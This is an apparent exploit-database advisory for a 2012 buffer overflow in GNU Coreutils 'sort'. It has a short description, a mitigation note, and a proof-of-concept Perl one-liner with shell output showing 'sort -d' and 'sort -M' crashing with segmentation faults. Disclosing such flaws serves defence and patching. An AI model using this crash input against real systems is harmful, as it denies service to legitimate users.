GNU Coreutils Buffer Overflow Vulnerability

vendor:

Coreutils

by:

SecurityFocus

7,5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Coreutils

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2012

GNU Coreutils Buffer Overflow Vulnerability

GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input. A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly bounds checked.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/57492/info

GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input.

A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed. 

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d
[1] 13431 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13432 segmentation fault sort -d

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M
[1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13434 segmentation fault sort -M